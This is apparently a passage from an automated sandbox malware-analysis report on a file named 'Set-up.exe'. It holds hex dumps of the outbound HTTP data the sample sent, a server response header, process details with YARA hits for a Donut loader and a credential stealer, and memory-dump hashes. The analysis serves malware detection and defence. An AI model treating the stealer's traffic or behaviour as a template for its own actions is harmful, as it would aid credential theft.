                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 36 77 99 bb 06 07 9f d0 b2 84 34 2d 49 10 94 3f 97 fb df 3a bb 7e bb 66 5e e1 32 b8 e3 f7 8c cf 77 64 1c e6 8f f4 bf 33 13 05 00 e0 08 03 8d 44 28 14 30 d7 a7 a6 1e 8c a4 9d 87 f3 c3 eb b0 27 94 1b 9d b7 7b 20 ae 7a ff 61 03 b0 86 cd 53 e0 d5 1f 23 37 87 28 02 e0 d5 52 1b 92 ae c0 a2 a7 84 fe 2a 3d 60 80 9d 0a d0 40 42 bc 88 43 08 13 2a fd 1e 93 7b 9a 10 13 59 ed fb a5 55 e0 85 be b7 e4 cd 96 91 bf 6f d8 b1 aa 3a 0e 39 0a 0b d7 3f d7 bb 55 7a fd 0d 44 1e df b8 bc 47 06 68 df 1c 9a f8 07 b3 f1 15 62 94 55 1f c3 31 04 c7 74 30 42 d0 42 a3 50 af e4 4f 59 7a e3 9e 4b 67 72 b1 be 85 05 35 04 fe 39 38 3e b1 4c 47 34 bc be 0d b6 cb 46 e5 21 b2 fa e2 41 6c e7 5f c9 c9 5f 41 76 20 78 63 4a 2a 1a 78 c5 38 0b c8 79 f8 2b a9 02 f4 f6 d0 cf fa e0 5d a3 f1 8e 53 36 1f
                                                                                                                      Data Ascii: 6w4-I?:~f^2wd3D(0'{ zaS#7(R*=`@BC*{YUo:9?UzDGhbU1t0BBPOYzKgr598>LG4F!Al__Av xcJ*x8y+]S6
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: ee b8 cf da be 16 33 15 c9 4d 40 ad c8 7d 29 db cd 86 83 a0 4e 2d a6 54 bf 80 f7 24 d7 6f 4f 31 36 a4 75 fe 0b 5d 90 91 54 cc c5 a2 14 ed 78 10 07 25 eb 6b 1f 42 64 76 01 db 25 75 cb 03 62 18 18 7f 36 dc de 94 50 69 f5 5c 1c fe 2c 90 c6 fa ed ca fa fd 4f 5d cd b3 08 ee 66 ce f6 24 47 e9 8d 6b 8d 22 c7 2c 98 a5 b0 70 64 63 8f 35 db 3c 7e 31 9c d5 96 b8 a3 1e 43 51 1f 62 50 19 84 f1 c6 bf df be f8 f5 c2 86 6e f7 0a d6 7d e6 35 ee 32 b2 ff 94 ba d1 ea 0c 7d 99 f5 cf 6e a9 01 aa 2a 43 07 3b d5 c3 03 6a 96 bf ff f4 bc 79 29 c4 d2 8a 50 14 b7 59 81 89 9a 7f a3 7a fa fe 89 3b f3 4e 7d 9e 7e b9 3d 4f 5b 04 02 e8 be 37 95 02 f1 da e2 b2 6b 4a 7b 51 f8 e8 d5 c2 47 15 a8 ec 2b 41 8c d1 63 6a 61 bd df 05 bd d5 fe 98 e4 51 3b ed 5e 77 50 c4 4f 0b 79 8e f0 e1 88 aa e8
                                                                                                                      Data Ascii: 3M@})N-T$oO16u]Tx%kBdv%ub6Pi\,O]f$Gk",pdc5<~1CQbPn}52}n*C;jy)PYz;N}~=O[7kJ{QG+AcjaQ;^wPOy
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 5b 99 3b 34 39 a7 c3 dc 3d fc 6d f5 28 3f 67 c8 64 e6 58 fd 4d 76 35 29 58 f0 dd 76 90 2e a1 0e 1d 6b 02 e0 a8 0e 98 ee dc 59 11 07 91 9c 63 5e 7b b0 7a de 4c 02 b4 8c a8 d0 6a ee df a7 3d 10 35 0d ff ce dd a7 92 5a 20 e1 ba f5 c5 23 d7 1a 64 bc 4c ef 6f 91 68 11 ab 6f 66 8a 8b 53 44 56 8e 67 17 f6 55 36 3c 2f 2c fe 69 8d 60 4a a3 32 3e 37 b0 fe 13 82 87 a3 e1 13 a2 c0 8e fd 01 12 3c a9 a8 d2 03 48 d0 29 05 9a 4d 7b ed 36 27 49 46 42 54 72 8b 05 60 be ba 3f 18 f4 b5 ae 12 a6 48 27 04 20 e0 44 ce 8b 27 35 3e dc ab 18 be 8f b4 d3 18 32 e8 f6 c6 59 90 ae 89 bb 8c 81 84 81 0c 4f 03 68 e9 af 3f c4 32 dc 1c 0f c0 c3 fa 43 4c 2f 89 c7 95 65 92 40 88 e9 28 4d 67 a2 9b f4 11 4c 06 6f 0d 73 f6 12 fb f2 5e c6 7e de 39 f2 e6 c9 f5 3c 70 ac 87 3e c1 f3 4e f8 91 a2 cd
                                                                                                                      Data Ascii: [;49=m(?gdXMv5)Xv.kYc^{zLj=5Z #dLohofSDVgU6</,i`J2>7<H)M{6'IFBTr`?H' D'5>2YOh?2CL/e@(MgLos^~9<p>N
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 29 c4 85 76 b9 6c bc 9f 7b 19 64 b4 2b d5 06 1d f6 b2 49 77 8c 3b 98 91 6a 9f 19 b9 5f b6 d9 56 ef 49 f5 53 4c bf 92 0a 1c 00 1d fc eb 1f dd 28 62 b6 ea 30 f3 2c e2 ef 2b 98 e4 79 46 3a 3b 97 85 f7 f6 81 7e ad 16 26 21 eb d0 d8 ec 5c e0 e0 1c d5 85 68 7e 40 9f 14 aa 97 70 68 43 50 94 17 4c 73 88 29 89 0a af bf 10 e6 46 45 29 c6 7c e9 d5 b7 7f c9 5f a3 34 dc 86 b0 c2 42 31 27 1c 86 aa 5e 3e c1 b7 f0 ea 94 29 6e 45 46 f2 1d e7 c3 7a 65 a8 aa cc ac 83 61 46 fc d6 16 f0 8c b1 a3 e7 ed c4 f8 70 78 f5 c9 1f ba 51 a4 0e 16 2a 96 f1 62 89 8b 05 c5 32 a5 c2 eb 67 2d a8 aa e8 6b 08 4a f3 8a c0 33 49 ae 6a 90 50 dc ba b7 2b 13 f4 82 00 01 ee 3b 6d 41 b9 1f db ce 6a da 45 22 3d 82 f5 71 cd ab da 4c 55 35 95 9c ac ab 63 3f 65 dd 5b 96 d4 e5 db c3 82 fa b3 f6 03 ef 07
                                                                                                                      Data Ascii: )vl{d+Iw;j_VISL(b0,+yF:;~&!\h~@phCPLs)FE)|_4B1'^>)nEFzeaFpxQ*b2g-kJ3IjP+;mAjE"=qLU5c?e[
                                                                                                                      2025-01-05 17:53:46 UTC15331OUTData Raw: 49 9b 30 24 cc d1 02 f5 a1 33 c3 d5 cd 10 15 87 48 c6 f0 5c df cd 4f b5 7c 5d 98 f7 1d e4 0f f5 2e 0e f8 79 86 cf f5 ae 56 ed 3d ad 15 34 fb 99 ec 37 8b a1 0f 99 73 62 b2 4e 35 d2 e9 7e af fc d9 dc bb fe 6c 9e c1 d8 ac 2e 85 a5 4e fc 4f 6d 60 2f f1 0b 7a 9c ed 03 f1 69 62 94 71 88 d5 6d 43 9e 32 9f ff 50 58 fa 3b d8 7d 5c fc e3 c4 fa 1b 14 70 1b 1e 1c 60 5f 07 f2 a4 ec ea c8 99 c6 d9 0d 47 fa 50 7f 38 ab 9d 85 40 81 70 ff e5 85 6b 1b 11 ee b7 81 5e 29 10 14 04 ee c3 9e 93 08 78 60 a7 0b 3c f0 07 cc 1f 16 b8 85 c7 55 57 6b 1d 0b e7 24 40 64 b9 0c 58 21 f0 fb 76 ce 0a 82 7e d4 6a cc 52 ca fc dc 03 cf c7 7e f6 66 cb f7 9c 2b 6f 14 97 37 59 31 23 9d 13 3f 5c 04 86 67 08 b4 27 80 75 3f 1a 76 de 05 32 f6 38 fc ef b8 58 e7 36 30 2d 8b 10 04 4e 4e 8f 25 4a 5f 9e
                                                                                                                      Data Ascii: I0$3H\O|].yV=47sbN5~l.NOm`/zibqmC2PX;}\p`_GP8@pk^)x`<UWk$@dX!v~jR~f+o7Y1#?\g'u?v28X60-NN%J_
                                                                                                                      2025-01-05 17:53:48 UTC1135INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=eibmb7d5rbio63kvlnrr0t0idn; expires=Thu, 01 May 2025 11:40:27 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kX8Z5zVOkehl%2BkZTLDExrIRDG9e7YvQ5K5pBITSgyDypBb0g68VNcxhQyFm5v6IgL49RKwBVQCwB2pUl3KOHgsUX0Zsh%2Blb80zLTFcCqtqZiSBciS58uAhIgOXan394uPWCR3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd5546c9bce42b9-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1574&rtt_var=599&sent=197&recv=589&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574992&delivery_rate=1813664&cwnd=184&unsent_bytes=0&cid=4650188c87fad42e&ts=1660&x=0"


                                                                                                                      050100s020406080100

                                                                                                                      Click to jump to process

                                                                                                                      050100s0.0020406080MB

                                                                                                                      Click to jump to process

                                                                                                                      • File
                                                                                                                      • Registry

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Target ID:0
                                                                                                                      Start time:12:53:14
                                                                                                                      Start date:05/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\'Set-up.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:76'577'172 bytes
                                                                                                                      MD5 hash:762266932C784BB2723293AD1CBECC37
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true
                                                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                      Non-executed Functions

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Offset: 00945000, based on PE: false
                                                                                                                      • Associated: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_92c000_'Set-up.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9af9bc40153e32a143e535ee7ae338e75d6f379bb1b3743e30144ea136e1d620
                                                                                                                      • Instruction ID: c4f63575dffd5f1271da4f267000e8d98f3cd8f62f292b54cb1c9d2778568cee
                                                                                                                      • Opcode Fuzzy Hash: 9af9bc40153e32a143e535ee7ae338e75d6f379bb1b3743e30144ea136e1d620
                                                                                                                      • Instruction Fuzzy Hash: 81B1EB5145E3C21FDB578B748CA9892BF706E2321431E86CFC8C68F8A3D259954AD7A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Offset: 00945000, based on PE: false
                                                                                                                      • Associated: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_92c000_'Set-up.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: aa0503fa4a6dab11e9cb2fe833cac379ee35d63a66b86b13dc7d0c629941e7e2
                                                                                                                      • Instruction ID: b2b7ceb65d6fade5b4b6709b0ed5b77107cf4b3db84cc36f15502ccffc44ece0
                                                                                                                      • Opcode Fuzzy Hash: aa0503fa4a6dab11e9cb2fe833cac379ee35d63a66b86b13dc7d0c629941e7e2
                                                                                                                      • Instruction Fuzzy Hash: B0A10C5145E3C21FDB578B748CA9892BF70BE2321431E86CFC8C68F9A3D249954AD763